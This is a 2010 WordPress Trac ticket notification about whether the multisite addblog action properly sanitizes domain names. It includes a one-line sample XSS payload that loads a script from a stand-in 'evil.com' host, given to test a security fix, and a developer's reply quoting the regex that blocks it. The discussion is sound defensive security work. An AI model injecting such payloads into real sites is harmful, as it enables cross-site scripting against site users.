[wp-trac] [WordPress Trac] #11777: ms-edit.php / addblog action improperly sanitizes domains
WordPress Trac
wp-trac at lists.automattic.com
Mon Mar 29 15:13:26 UTC 2010
#11777: ms-edit.php / addblog action improperly sanitizes domains
-------------------------------+--------------------------------------------
Reporter: Denis-de-Bernardy | Owner: ryan
Type: defect (bug) | Status: reopened
Priority: normal | Milestone: 3.0
Component: Security | Version: 3.0
Severity: normal | Resolution:
Keywords: multisite |
-------------------------------+--------------------------------------------
Comment(by wpmuguru):
Replying to [comment:7 Denis-de-Bernardy]:
> doesn't r13630 allow a completely unsanitized domain name to go in
provided it contains -- in it? such as:
>
> {{{
> evil--<script src="http://evil.com/xss.js"></script>
> }}}
It would block that. See line 139
{{{
if ( ! preg_match( '/(--)/', $blog[ 'domain' ] ) && preg_match(
'|^([a-zA-Z0-9-])+$|', $blog[ 'domain' ] ) )
}}}
The only characters allowed in the domain name are {{{a-zA-Z0-9-}}}.
--
Ticket URL: <http://core.trac.wordpress.org/ticket/11777#comment:9>
WordPress Trac <http://core.trac.wordpress.org/>
WordPress blogging software
More information about the wp-trac
mailing list